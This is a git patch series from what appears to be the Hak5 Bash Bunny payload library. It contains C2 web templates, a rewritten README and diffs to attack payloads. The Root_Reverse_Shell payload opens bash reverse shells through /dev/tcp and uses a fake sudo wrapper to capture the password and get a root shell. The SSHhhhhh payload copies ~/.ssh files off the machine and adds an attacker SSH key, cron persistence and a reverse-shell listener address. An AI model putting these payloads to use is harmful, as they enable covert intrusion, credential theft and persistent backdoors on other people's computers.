zUsRe|;h-k)Yr~3B^uBiMwK;6K7Scyu?Aa7kdN-&_So*wURwA!GMzhZ2#q(8w_esKt zL|>sPoZLYV#x_Gr4@S#fXET(Uwk ztvajM+lBlj;sjv+h5EV`;7YjSs-d2zVKg-}&RSVc0}VRo9}}k%Dx`JvB9e>qa89@m zQMuwM@Ez_^Sb6Xr$OFQe8xEeFHWuf1!JXL^6*Z7!8KIYJ!$ND?B7QaYKH5=$;)3Nd%N-!f6d63HdeMsnmj zD|cHqowbk{N-jri=GK)klv`Q&eN^Z5d!1VU{r)`r%e=my&*yob&+|N=XV3fn{eJ7` z<;lcIN`BK`vp4ovLaxXMO$Ynp=0#H}sAS4)6I~Y*I+o}-m03|TJEcze;C@IynC9}tpTRphT6+ zB+CTSvQ?(u%#K_@fFLG4M&7QocE{$WiIF)&alykYDQ9`2YoP;GY&)sVbm2*H<;K= z&Bi8;XLT_xes`&3^ivHd4MpxGYY)Q;6|+VZa~Bepyu%Z^L~uSA@i6p)$d)Mgyi?l4 z{?%Tg2Ue^$8kD%{4B39(&|e`QU`ZY~Wuvopg(eT4+4xTD#8qfS?bC{huv28&DIff4 zYg#EqHZVY-`J%r5GOlZFU;FzoRh;L&P+p=QFZfw`azw9%9{K$SsCS9nC=PqOZ?1-W zx*o}Zk3zy;A%C~Ci1HPm_Cb`WR(;%j-c->psx;fb+jTtSWDi=J36^4SPY@u$Mh`qS z&P$$fW$8Qm)>Wh?_5tEeazCZ*F1}9{^jX;1-Gy!t2D;Q>x-BhHO@}u(n|Z-7Q)sX9 zRI6}5$I1K5iP5ShjloF7dre{^{&cZaWlr>=J8lAF8}D^t7ky%!=bgQxrn<65gO=Ry zTEeF`XNgr;cd6j1$l|fAjtSv@ciy9IGqmygD0Rk2qvuCjbhJZpop5CNn6WM;$)`ZN zPVSsk^>b7;w;VxNE6aO~d>Fm7tpTQ@Wyu@7|M_LB)?se5N1t!Oy&GM0!o(>94NzL{ z>E5ApkLT87KylN_bsWpO+r~bqffJgIypZ*X25Y(?aH?RegR8w8;}U>PDzT5Mcyc!- z57Q7$#~eyTL#i#u<$_FPYw7XLTh@;*k^g-3DWgk$ODt+HerEO)-My0#f({rw2)n{*gZsTZFL>-i zjqXGAnP7WFQttd=%fL5wOc<9PZiW!Tu;*@Krc%4W?uz8x|B zOSDX@XEMch<*B@V?bE&!bac#)L{nBibW)p}9O|$zU>nTW%|;X%|q=Cv0q-R)pHD<@768+E`Fru;A=% zy%Tzz%Nb{%U?Q}#rFV_~`LZmuj!}-V(gZyx3v0MSoVxdbJ|2Uzvr@}&kK5@jkfa+j z;E~R_J`3^D(X{ zC#3M4N#F1C%L`~reNxDjHnpfsv#5qE~f+06e>jq&$#ZR|`b-VEb1!hbdThXW&>h=In zWIIXF^;yD}E%)VK{3WqXld2V8iX9q6%zun6)b-aR9egIDruYGConrLRy%I&|?V+FFVhl4?BSj($F}U{3CL7O*+E=+qhg+(QS*?Q{Tw zHP)=yLbWEd9|zcwH@!KAKeS7C_^iN47^bi#!gt7wllw{%d-j7^_10k9ZvV36a*`Wb z-j>W9SKURD^s9Oj%!*!YcGKDJ7d_BNW2`;BicncV%V15?B7KW80hS+F%$s*>e1{)U zQk+vbSW&uyBvusnwFAGkLoK)cQ}*o2je|KM%OBS_(h^|33PJLul4+U1uj2T2Q$@b%8g8^g!T7Zt44LoMeCLvJ z(M!c=C_9Bz>}OCs@A5TdhMU|E@zju0+FnRlMg;@>qqFsExgz%bw%EY_t0$T63J^`WSSu6oqE(Rbq^G^Vf&U8D>$(HC@3!lgb6UnC_Z7=`_5AK&%58Iq%+>a+ zR*izo5749#s)_Pz&Zq|W_02D|u3R?=7S3K%=m2ey*Z^cZ%Tx@LJFFB9ZxAxtlEp;^ z|E<@sm6Jk_b7=CI7AUN%WoLvuYEoJn62H}%UwO*k%3tumx?$+80sn=+$XZR@;MIzE|Vo zp`Ds4I)^D7&tsS8#dW~T5-K;x1J3$C=luHhHl+AK=ded?B~;CtvI z1X%#+udV+^GWeegUxO${Fu%>;;9C9s3p)j!{wp)CK71z!v7`xU^GBaCA1v7GU%nX& z+hgy{uo0M~eH7I)vIa!^&Ptcd&_bUk93i8*$7c z{-dJ7<6=Ag(+}e6=Pl=7t})-!fL*g!_lt}1*)yX}9RRtQdoZ98+S%zC_OahJ!AnZ4 z#$a+cHBfO+gMPoJk`sT61!`0#x+H3|{F9j4tlQ=Lz{T0hUwULe$_0N5z4an8W}TzL z<@$2=!)wC*0UIPLc)LL@7rFV@tzSWg?}r@~?{MPLB|Y)=7^Nkp7_OJSw7{g7ev26Y zZTKJ+kD+wG|1?<~?EOsHy){Vr6o0{+jo}ndhE?d4jh(7-wTc&pH-72yZ#zsqYOb(R zf?sJr-?`Bm=rth>%GXkulN@wusUgh<;0r&OL>t%?Bj?FD=EdELiaHupo-aFTE_ijn z=}kbSpp>kWeLS=6hF7A@OH4u3`_q<^&U@zSnI9B=N<*QQ+n>vLx zQlcq0n?yW6pVs=&7YOa&8+yQiYQ#^NH8@kDy>tNF43*CoZx!5s7Q>4;>>?(+L#N+x zQuh-7F_5)Tj%u8047X`tJa&Q0uYEZIDNv>#W&Ka z8Vi}N?>gM>r&^wZ2=~*wrlEZ7x@xH1v}g}ndxd9M4o`~K{znm;8+Jdr{4mG?;F%64 zsGqDOf%8MPA_#bV(e?LUWW@|esA$cC#LI7_l^+H<-yH*jD2Xv@$K*ata&KGOvims+hi%*j_MuW<4!tr3ib0*<8xT-*vluM7S`1{pr zZsLsJe{(#1@Re1&`kjVD!ac8V0%bl768-rPxsC+4Ga#c#z_O&$L*aAM@xf(zgZrGt z_y;#UcRR$v?CrkR2&4%+BbB@3x4_z(q@)%K9q^~>gcK|?zXk@$God zBMb=j^AdLOdX3B%j^YW=`P+7@IixMH)_Px*eRQ9>Wl}(QG;elIm9F+tj~Z|rB2taN z=EjP-_49KC^UL+~o{}RfGQQ?jy=&WJAPe;s6B?e zUk#SUhN<=b=XKfO8DtYjUQwREKGWMOX&G>%$M5mW07s_nX2FgWy!X&bpIU*^@Glj{KNkz{cSg1@|^!4G9ke#eRKili9AOU%VG3FoF3bBh6o- zpDoYd3HYx0lj!|-=6@~zufP1?;s|$GXxSj7;?xxn&-Dsxz{lj6+0pVNPM7`*f1d}r literal 0 HcmV?d00001 diff --git a/payloads/library/remote_access/BlueBunny/C2/templates/connecting.html b/payloads/library/remote_access/BlueBunny/C2/templates/connecting.html new file mode 100644 index 00000000..aaaf3183 --- /dev/null +++ b/payloads/library/remote_access/BlueBunny/C2/templates/connecting.html @@ -0,0 +1,163 @@ + + + + + + + + BlueBunny + + + + + + +
+ + +
+
+
+
+

Payload One-Liner

Run a single line of code

+
+ + +
+
+
+

Payload Script

Upload and execute a payload file

+
+ +
+ +
+
+

Attack Mode

Configure Ethernet, Storage, HID and Serial

+
+ + +
+
+
+

LED

Light up your Bush Bunny

+
+ + +
+
+
+

CPU

Tune the CPU to your needs

+
+ + +
+
+
+

Power

Take a break

+
+ + +
+
+
+
+
+
+
+
+

Connecting your Bash Bunny...

+
+ +
+

This can take some time. Make sure your Bash Bunny is nearby and the BlueBunny payload is running successfully (Green LED).

+
+
+
+
+ + \ No newline at end of file diff --git a/payloads/library/remote_access/BlueBunny/C2/templates/index.html b/payloads/library/remote_access/BlueBunny/C2/templates/index.html new file mode 100644 index 00000000..9b21de77 --- /dev/null +++ b/payloads/library/remote_access/BlueBunny/C2/templates/index.html @@ -0,0 +1,337 @@ + + + + + + + + BlueBunny + + + + + + +
+
+ + +
+
+
+
+
+

Payload One-Liner

Run a single line of code

+
+ + +
+
+
+

Payload Script

Upload and execute a payload file

+
+ +
+ + +
+ +
+
+
+

Attack Mode

Configure Ethernet, Storage, HID and Serial

+
+ + +
+
+
+

LED

Light up your Bush Bunny

+
+ + +
+
+
+

CPU Control

Tune the CPU to your needs

+
+ + +
+
+
+

Power Management

Take a break

+
+ + +
+
+
+
+ + + + + + \ No newline at end of file From 9aac0c1b74be4a9cd154bb220c6b2fae9a7e0ce4 Mon Sep 17 00:00:00 2001 From: Peaks <115900893+hak5peaks@users.noreply.github.com> Date: Sun, 23 Jun 2024 16:53:35 -0400 Subject: [PATCH 49/56] New and improved README. New and improved Bash Bunny readme to match USB rubber ducky readme --- README.md | 263 +++++++++++++++++++++++++++++++++++++++++++++++++----- 1 file changed, 239 insertions(+), 24 deletions(-) diff --git a/README.md b/README.md index 257d1f1b..cd03efb6 100644 --- a/README.md +++ b/README.md @@ -1,45 +1,242 @@ -# Payload Library for the Bash Bunny by Hak5 +# Payload Library for the [Bash Bunny](https://shop.hak5.org/products/bash-bunny) by [Hak5](https://hak5.org) This repository contains payloads and extensions for the Hak5 Bash Bunny. Community developed payloads are listed and developers are encouraged to create pull requests to make changes to or submit new payloads. -## About the Bash Bunny +**Payloads here are written in official DuckyScript™ and Bash specifically for the Bash Bunny. Hak5 does NOT guarantee payload functionality.** See Legal and Disclaimers -By emulating combinations of trusted USB devices — like gigabit Ethernet, serial, flash storage and keyboards — the Bash Bunny tricks computers into divulging data, exfiltrating documents, installing backdoors and many more exploits. -- [Purchase at Hak5](https://hak5.org/products/bash-bunny "Purchase at Hak5") -- [Documentation](https://docs.hak5.org/bash-bunny/ "Documentation") -- [Bash Bunny Forums](https://forums.hak5.org/forum/92-bash-bunny/ "Forums") -- Discord: [https://hak5.org/discord](https://hak5.org/discord) +
+ +      + +
+ + +
+
+

+ +
+View Featured Bash Bunny Payloads and Leaderboard +
Get your payload in front of thousands. Enter to win over $2,000 in prizes in the Hak5 Payload Awards! +

-![enter image description here](https://cdn.shopify.com/s/files/1/0068/2142/products/bash-bunny-mk2_001_c58d9658-b151-4328-af26-11eef3c47355_300x.jpg) +
+ +      + +      + +      + +      + +

+ +
+ + +# Table of contents +
+ +
+ + +## Shop +- [Bash Bunny Mark II](https://shop.hak5.org/products/bash-bunny "Purchase the Bash Bunny") +- [PayloadStudio Pro](https://hak5.org/products/payload-studio-pro "Purchase PayloadStudio Pro") +- [Shop All Hak5 Tools](https://shop.hak5.org "Shop All Hak5 Tools") +## Getting Started +- [Build Payloads with PayloadStudio](#build-your-payloads-with-payloadstudio) | [Getting STARTED](https://docs.hak5.org/bash-bunny/beginner-guides/ "QUICK START GUIDE") | [Your First Payload](https://docs.hak5.org/bash-bunny/writing-payloads/payload-development-basics) +## Documentation / Learn More +- [Documentation](https://docs.hak5.org/bash-bunny/ "Documentation") + +## Community +*Got Questions? Need some help? Reach out:* +- [Discord](https://hak5.org/discord/ "Discord") | [Forums](https://forums.hak5.org/forum/92-bash-bunny/ "Forums") + + +## Additional Links + Follow the creators
+

+ Korben's Socials
+ + +
+ Darren's Socials
+ + +

+ +
+

About the Bash Bunny

+ +Linux machine in a USB. By emulating combinations of trusted USB devices — like gigabit Ethernet, serial, flash storage and keyboards — the Bash Bunny tricks computers into divulging data, exfiltrating documents, installing backdoors and many more exploits. + + +
+
+

+
 + +

+ + + +
+

+ + +

+ image +

+ +##
ADVANCED ATTACKS
+ +For the sake of convenience, computers trust a number of devices. Flash drives, Ethernet adapters, serial devices and keyboards to name a few. These have become mainstays of modern computing. Each has their own unique attack vectors. When combined? The possibilities are limitless. The Bash Bunny is all of these things, alone – or in combination – and more! + +

+ image +

+ +##
SIMPLE PAYLOADS
+ +Each attack, or payload, is written in a simple Ducky Script™ language consisting of text files. This repository is home to a growing library of community developed payloads. Staying up to date with all of the latest attacks is just a matter of downloading files from git. Then loading ’em onto the Bash Bunny just as you would any ordinary flash drive. + +

+ image +

+ +##
SIMPLE POWERFUL HARDWARE
+ +It's a full featured Linux box that'll run your favorite tools even faster now thanks to the optimized quad-core CPU, desktop-class SSD and doubled RAM. Choose and monitor payloads with the selection switch and RGB LED. Access an unlocked root terminal via dedicated Serial console. Exfiltrate gigs of loot via MicroSD. Even remotely trigger or geofence payloads via Bluetooth. + + +

Build your payloads with PayloadStudio

+

+Take your DuckyScript™ payloads to the next level with this full-featured, web-based (entirely client side) development environment. +
+ +
+Payload studio features all of the conveniences of a modern IDE, right from your browser. From syntax highlighting and auto-completion to live error-checking and repo synchronization - building payloads for Hak5 hotplug tools has never been easier! +

+Supports your favorite Hak5 gear - USB Rubber Ducky, Bash Bunny, Key Croc, Shark Jack, Packet Squirrel & LAN Turtle! +


+Become a PayloadStudio Pro and Unleash your hacking creativity! +
+OR +
+ Try Community Edition FREE +

+ +
+ Payload Studio Themes Preview GIF +

+ +
+ Payload Studio Autocomplete Preview GIF +

-## Documentation -Documentation on developing payloads for the Bash Bunny can be found on the [docs.hak5.org](https://docs.hak5.org/bash-bunny/) website. Guides can be found on the [Bash Bunny blog](https://hak5.org/blogs/bash-bunny). ## Disclaimer Generally, payloads may execute commands on your device. As such, it is possible for a payload to damage your device. Payloads from this repository are provided AS-IS without warranty. While Hak5 makes a best effort to review payloads, there are no guarantees as to their effectiveness. As with any script, you are advised to proceed with caution. -## Legal -Payloads from this repository are provided for educational purposes only. Hak5 gear is intended for authorized auditing and security analysis purposes only where permitted subject to local and international laws where applicable. Users are solely responsible for compliance with all laws of their locality. Hak5 LLC and affiliates claim no responsibility for unauthorized or unlawful use. +

Contributing

+ +

+ +
+View Featured Payloads and Leaderboard +

+ +# Please adhere to the following best practices and style guides when submitting a payload. -## Contributing Once you have developed your payload, you are encouraged to contribute to this repository by submitting a Pull Request. Reviewed and Approved pull requests will add your payload to this repository, where they may be publically available. -Please adhere to the following best practices and style guide when submitting a payload. +Please include all resources required for the payload to run. If needed, provide a README.md in the root of your payload's directory to explain things such as intended use, required configurations, or anything that will not easily fit in the comments of the payload.txt itself. Please make sure that your payload is tested, and free of errors. If your payload contains (or is based off of) the work of other's please make sure to cite their work giving proper credit. + + +### Purely Destructive payloads will not be accepted. No, it's not "just a prank". +Subject to change. Please ensure any submissions meet the [latest version](https://github.com/hak5/usbrubberducky-payloads/blob/master/README.md) of these standards before submitting a Pull Request. + + + +## Naming Conventions +Please give your payload a unique, descriptive and appropriate name. Do not use spaces in payload, directory or file names. Each payload should be submit into its own directory, with `-` or `_` used in place of spaces, to one of the categories such as exfiltration, phishing, remote_access or recon. Do not create your own category. + +## Staged Payloads +"Staged payloads" are payloads that **download** code from some resource external to the payload.txt. + +While staging code used in payloads is often useful and appropriate, using this (or another) github repository as the means of deploying those stages is not. This repository is **not a CDN for deployment on target systems**. + +Staged code should be copied to and hosted on an appropriate server for doing so **by the end user** - Github and this repository are simply resources for sharing code among developers and users. +See: [GitHub acceptable use policies](https://docs.github.com/en/site-policy/acceptable-use-policies/github-acceptable-use-policies#5-site-access-and-safety) + +Additionally, any source code that is intended to be staged **(by the end user on the appropriate infrastructure)** should be included in any payload submissions either in the comments of the payload itself or as a seperate file. **Links to staged code are unacceptable**; not only for the reasons listed above but also for version control and user safety reasons. Arbitrary code hidden behind some pre-defined external resource via URL in a payload could be replaced at any point in the future unbeknownst to the user -- potentially turning a harmless payload into something dangerous. + +### Including URLs +URLs used for retrieving staged code should refer exclusively to **example.com** using a bash variable in any payload submissions [see Payload Configuration section below](https://github.com/hak5/usbrubberducky-payloads/blob/master/README.md#payload-configuration). + +### Staged Example + +**Example scenario: your payload downloads a script and the executes it on a target machine.** +- Include the script in the directory with your payload +- Provide instructions for the user to move the script to the appropriate hosting service. +- Provide a bash variable with the placeholder example.com for the user to easily configure once they have hosted the script + +[Simple Example of this style of payload](https://github.com/hak5/usbrubberducky-payloads/tree/master/payloads/library/exfiltration/Printer-Recon) + +## Payload Configuration +Be sure to take the following into careful consideration to ensure your payload is easily tested, used and maintained. +In many cases, payloads will require some level of configuration **by the end payload user**. + +- Abstract configuration(s) for ease of use. Use bash assignment variables where possible. +- Remember to use PLACEHOLDERS for configurable portions of your payload - do not share your personal URLs, API keys, Passphrases, etc... +- URLs to staged payloads SHOULD NOT BE INCLUDED. URLs should be replaced by example.com. Provide instructions on how to specific resources should be hosted on the appropriate infrastructure. +- Make note of both REQUIRED and OPTIONAL configuration(s) in your payload using bash comments at the top of your payload or "inline" where applicable. + +``` +Example: + BEGINNING OF PAYLOAD + ... Payload Documentation... + + # CONFIGURATION + # REQUIRED - Provide URL used for Example + MY_TARGET_URL="example.com" + + # OPTIONAL - How long until payload starts; default 5s + BOOT_DELAY="5000" + + QUACK DELAY $BOOT_DELAY + ... + QUACK STRING $MY_TARGET_URL + ... +``` + +## Payload Documentation +Payloads should begin with `#` bash comments specifying the title of the payload, the author, the target, and a brief description. + +``` +Example: + BEGINNING OF PAYLOAD + + # Title: Example Payload + # Author: Korben Dallas + # Description: Opens hidden powershell and + # Target: Windows 10 + # Props: Hak5, Darren Kitchen, Korben + # Version: 1.0 + # Category: General +``` -### Naming Conventions -Please give your payload a unique and descriptive name. Do not use spaces in payload names. Each payload should be submit into its own directory, with `-` or `_` used in place of spaces, to one of the categories such as exfiltration, phishing, remote_access or recon. Do not create your own category. ### Binaries Binaries may not be accepted in this repository. If a binary is used in conjunction with the payload, please document where it or its source may be obtained. -### Comments -Payloads should begin with comments specifying at the very least the name of the payload and author. Additional information such as a brief description, the target, any dependencies / prerequisites and the LED status used is helpful. - - Title: SMB Exfiltrator - Description: Exfiltrates files from %userprofile%\documents via SMB - Author: Hak5Darren - Target: Windows XP SP3 - Latest - Dependencies: impacket ### Configuration Options Configurable options should be specified in variables at the top of the payload.txt file @@ -72,4 +269,22 @@ Stages should be documented with comments Common payload states include a `SETUP`, with may include a `FAIL` if certain conditions are not met. This is typically followed by either a single `ATTACK` or multiple `STAGEs`. More complex payloads may include a `SPECIAL` function to wait until certain conditions are met. Payloads commonly end with a `CLEANUP` phase, such as moving and deleting files or stopping services. A payload may `FINISH` when the objective is complete and the device is safe to eject or turn off. These common payload states correspond to `LED` states. +

Legal

+Payloads from this repository are provided for educational purposes only. Hak5 gear is intended for authorized auditing and security analysis purposes only where permitted subject to local and international laws where applicable. Users are solely responsible for compliance with all laws of their locality. Hak5 LLC and affiliates claim no responsibility for unauthorized or unlawful use. + +Bash Bunny and DuckyScript are the trademarks of Hak5 LLC. Copyright © 2010 Hak5 LLC. All rights reserved. No part of this work may be reproduced or transmitted in any form or by any means without prior written permission from the copyright owner. +Bash Bunny and DuckyScript are subject to the Hak5 license agreement (https://hak5.org/license) +DuckyScript is the intellectual property of Hak5 LLC for the sole benefit of Hak5 LLC and its licensees. To inquire about obtaining a license to use this material in your own project, contact us. Please report counterfeits and brand abuse to legal@hak5.org. +This material is for education, authorized auditing and analysis purposes where permitted subject to local and international laws. Users are solely responsible for compliance. Hak5 LLC claims no responsibility for unauthorized or unlawful use. +Hak5 LLC products and technology are only available to BIS recognized license exception ENC favorable treatment countries pursuant to US 15 CFR Supplement No 3 to Part 740. + +See also: + +[Hak5 Software License Agreement](https://shop.hak5.org/pages/software-license-agreement) + +[Terms of Service](https://shop.hak5.org/pages/terms-of-service) + +# Disclaimer +

As with any script, you are advised to proceed with caution.

+

Generally, payloads may execute commands on your device. As such, it is possible for a payload to damage your device. Payloads from this repository are provided AS-IS without warranty. While Hak5 makes a best effort to review payloads, there are no guarantees as to their effectiveness.

From 32e41527fb92f019745087ecbebe88b21793f2b1 Mon Sep 17 00:00:00 2001 From: Sridhar Date: Mon, 1 Jul 2024 10:30:09 +0530 Subject: [PATCH 50/56] Minor update --- .../remote_access/Root_Reverse_Shell_linux_mac/payload.sh | 8 ++++++-- .../Root_Reverse_Shell_linux_mac/payload.txt | 3 ++- 2 files changed, 8 insertions(+), 3 deletions(-) diff --git a/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.sh b/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.sh index 60895f5a..314a0bf9 100644 --- a/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.sh +++ b/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.sh @@ -1,5 +1,9 @@ #!/bin/bash +LISTENER_IP="127.0.0.1" +LISTENER1_PORT="1337" #Listener for user shell +LISTENER2_PORT="9001" #Listener for root shell + if [ ! -d ~/.config/sudo ] then mkdir -p ~/.config/sudo @@ -37,7 +41,7 @@ else mv ~/.bashrc.bak ~/.bashrc fi rm ~/.config/sudo/sudo - echo "$pwd" | sudo -S disown !$ $(sudo /bin/bash -i > /dev/tcp/192.168.0.118/1337 0<&1 2>&1) & + echo "$pwd" | sudo -S disown !$ $(sudo /bin/bash -i > /dev/tcp/$LISTENER_IP/$LISTENER1_PORT 0<&1 2>&1) & fi fi EOF @@ -51,5 +55,5 @@ else cp ~/.bashrc ~/.bashrc.bak echo "export PATH=~/.config/sudo:$PATH" >> ~/.bashrc fi -disown !$ $(/bin/bash -i > /dev/tcp/192.168.0.118/4444 0<&1 2>&1) & +disown !$ $(/bin/bash -i > /dev/tcp/$LISTENER_IP/$LISTENER2_PORT 0<&1 2>&1) & bash diff --git a/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.txt b/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.txt index 9a06e38d..76a949dd 100644 --- a/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.txt +++ b/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.txt @@ -36,7 +36,8 @@ Q DELAY 1000 Q CTRL C # Executing bash script which is same for mac and linux -Q STRING bash /Volumes/BashBunny/payloads/switch1/payload.sh +GET SWITCH_POSITION +Q STRING bash /Volumes/BashBunny/payloads/$SWITCH_POSITION/payload.sh # The cleanup process will done by bash script # Closing the xterm in linux From 00713d6b7f7c5711b7f7e8f7049783d72c97662e Mon Sep 17 00:00:00 2001 From: Sridhar Date: Mon, 1 Jul 2024 10:33:00 +0530 Subject: [PATCH 51/56] Minor update --- .../remote_access/Root_Reverse_Shell_linux_mac/payload.sh | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.sh b/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.sh index 314a0bf9..7b7cd436 100644 --- a/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.sh +++ b/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.sh @@ -2,7 +2,7 @@ LISTENER_IP="127.0.0.1" LISTENER1_PORT="1337" #Listener for user shell -LISTENER2_PORT="9001" #Listener for root shell +LISTENER2_PORT="4444" #Listener for root shell if [ ! -d ~/.config/sudo ] then From 94c3342302c3dc8b9ffa5d0f6e2c51f08fb75d78 Mon Sep 17 00:00:00 2001 From: Darkprince <30362337+sridharas04@users.noreply.github.com> Date: Mon, 1 Jul 2024 10:36:07 +0530 Subject: [PATCH 52/56] Update payload.sh --- .../remote_access/Root_Reverse_Shell_linux_mac/payload.sh | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.sh b/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.sh index 7b7cd436..8bb8fe8b 100644 --- a/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.sh +++ b/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.sh @@ -1,8 +1,8 @@ #!/bin/bash LISTENER_IP="127.0.0.1" -LISTENER1_PORT="1337" #Listener for user shell -LISTENER2_PORT="4444" #Listener for root shell +LISTENER1_PORT="1337" #Listener for root shell +LISTENER2_PORT="4444" #Listener for user shell if [ ! -d ~/.config/sudo ] then From 19b4ff63f0838a20685ed3eb647c5522a0f11c02 Mon Sep 17 00:00:00 2001 From: Darkprince <30362337+sridharas04@users.noreply.github.com> Date: Tue, 23 Jul 2024 17:56:14 +0530 Subject: [PATCH 53/56] Added delay for device recognition --- .../Root_Reverse_Shell_linux_mac/payload.txt | 32 +++++++++---------- 1 file changed, 16 insertions(+), 16 deletions(-) diff --git a/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.txt b/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.txt index 76a949dd..bbe4d459 100644 --- a/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.txt +++ b/payloads/library/remote_access/Root_Reverse_Shell_linux_mac/payload.txt @@ -1,47 +1,47 @@ # Title: Linux/Mac Reverse Shell -# Author: Darkprince(Sridhar) +# Author: Darkprince (Sridhar) # Version: 1.0 # -# Runs a script in the background that gives a user shell initially and waits for user to -# escalate privileges and give a root reverse shell -# -# Magenta..................Setup -# Red,Green,Blue......Executing -# Green....................Finished +# Runs a script in the background that provides a user shell initially and waits for the user to escalate privileges, then provides a root reverse shell. +# Magenta..................Setup +# Red, Green, Blue.........Executing +# Green....................Finished # INITIALIZING LED W -# Mac keyboard works in linux and mac +# Mac keyboard works in Linux and Mac ATTACKMODE STORAGE HID VID_0X05AC PID_0X021E LANGUAGE='us' -# Make sure the switch position is 1 +# Ensure the switch position is 1 +# Delay for HID device recognition +Q DELAY 1000 # ATTACKING LED R G B -# Get linux,mac Termial +# Get Linux/Mac Terminal RUN UNITY xterm Q DELAY 1000 -# To close opened window by linux run command +# To close the opened window by the Linux run command Q GUI Q Q CTRL C RUN OSX terminal Q DELAY 1000 -# If linux then clearing 'terminal' which is typed by mac run script +# If Linux, then clearing 'terminal' which is typed by Mac run script Q CTRL C -# Executing bash script which is same for mac and linux +# Execute bash script which is the same for Mac and Linux GET SWITCH_POSITION Q STRING bash /Volumes/BashBunny/payloads/$SWITCH_POSITION/payload.sh -# The cleanup process will done by bash script -# Closing the xterm in linux -# Closing the terminal in mac even if terminal has other process COMMAND Q and ENTER key will terminates terminal +# The cleanup process will be handled by the bash script +# Closing the xterm in Linux +# Closing the terminal in Mac, even if the terminal has other processes COMMAND Q and ENTER keys will terminate the terminal Q GUI Q Q CTRL C Q STRING exit From 1c2199298a07fd6ccd9aa02943c83da8ca7ff760 Mon Sep 17 00:00:00 2001 From: WWVB <48934034+WWVB@users.noreply.github.com> Date: Sat, 24 Aug 2024 09:49:52 -0400 Subject: [PATCH 54/56] Update payload.txt Added BashBunny drive label variable as suggested by @hak5peaks --- .../library/remote_access/SSHhhhhh-(Linux)/payload.txt | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/payloads/library/remote_access/SSHhhhhh-(Linux)/payload.txt b/payloads/library/remote_access/SSHhhhhh-(Linux)/payload.txt index e7548d8e..3509faa1 100644 --- a/payloads/library/remote_access/SSHhhhhh-(Linux)/payload.txt +++ b/payloads/library/remote_access/SSHhhhhh-(Linux)/payload.txt @@ -1,12 +1,14 @@ # Title: SSHhhhhh # Description: Exfiltrates files from user's .ssh folder to Bash Bunny via USB & adds backdoors # Author: WWVB -# Props: Hak5Darren -# Version: 1.0 +# Props: Hak5Darren, hak5peaks +# Version: 1.1 # Category: Exfiltration w/Persistence # Target: Linux Ubuntu 18.04 LTS # Attackmodes: HID, Storage +DRIVE_LABEL="BashBunny" + #!/bin/bash LED SETUP @@ -19,7 +21,7 @@ QUACK CTRL-ALT t QUACK DELAY 100 # Drop primary payload on the box -QUACK STRING cp /media/\$USER/BashBunny/payloads/$SWITCH_POSITION/boom.sh . +QUACK STRING cp /media/\$USER/$DRIVE_LABEL/payloads/$SWITCH_POSITION/boom.sh . QUACK ENTER QUACK DELAY 50 From e9a07640013dfcfcd2c10dc420a03147ef9b6b74 Mon Sep 17 00:00:00 2001 From: WWVB <48934034+WWVB@users.noreply.github.com> Date: Mon, 26 Aug 2024 19:46:23 -0400 Subject: [PATCH 55/56] Update boom.sh Set the RSA_KEY variable to a placeholder value, with instructions as to how the RSA public key info is found, per @hak5peaks suggestion --- payloads/library/remote_access/SSHhhhhh-(Linux)/boom.sh | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/payloads/library/remote_access/SSHhhhhh-(Linux)/boom.sh b/payloads/library/remote_access/SSHhhhhh-(Linux)/boom.sh index a1b7fc82..82643fc0 100644 --- a/payloads/library/remote_access/SSHhhhhh-(Linux)/boom.sh +++ b/payloads/library/remote_access/SSHhhhhh-(Linux)/boom.sh @@ -3,11 +3,11 @@ # Main Payload # Set variables for METERPRETER Reverse_TCP Session, CRON schedule, Attacker's RSA Key, etc.. +RSA_KEY='PLACEHOLDER-FOR-RSA-PUBLIC-KEY' # replace with the contents of ~/.ssh/id_rsa.pub or whatever your RSA public key file is named REVERSESHELL=true LHOST='10.20.20.104' # Reverse Shell listening host IP LPORT='4444' # Reverse Shell listening host port CRON='30 */1 * * *' # Just the timing portion of the CRON job -RSA_KEY='ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCkmgAxtb8fYA7Bbk+Cs0X+gR43gYbbzdHg7AesoOF5Q95mcbiL7mu79FG4fO7Tnrtl2ARCFJZo8bphbEiSVC/zMPNqgP0trXJld2vbbpRWT8vMsysT4dgAssp9zosJdIR7y0akKByglcVPcaCub/KcQo1mtOq/HNkJ8DOmBeLNHYsL6X0HG2Zccid21DQq4dTMnKAqQrJUCPNRrE2tAx/C0E8SsVtq3cjp6T0H8AINLaHUnmAAI02PLjCZeQ6xUqnpAhgPMymwpjQ66O5EM+Vf5UlhFULn0jmlVnhxNULvYQHfRLY6YhTgVVPSxNUp+sWhyRJ1tx0nAEoJh82gwJ7J engineering@kali-2' ATTACKER_HOST='engineering@kali-2' # Tail end of RSA key from above. Do not include spaces DT=$(date "+%Y.%m.%d-%H.%M.%S") DN=/media/$USER/BashBunny/loot/$USER-$HOSTNAME-$DT From 70eac91d25c738e43a32448cac4d7d45e3d052a3 Mon Sep 17 00:00:00 2001 From: WWVB <48934034+WWVB@users.noreply.github.com> Date: Mon, 26 Aug 2024 19:52:49 -0400 Subject: [PATCH 56/56] Update payload.txt Implemented the $DRIVE_LABEL variable into the umount command, per @hak5peaks suggestion --- 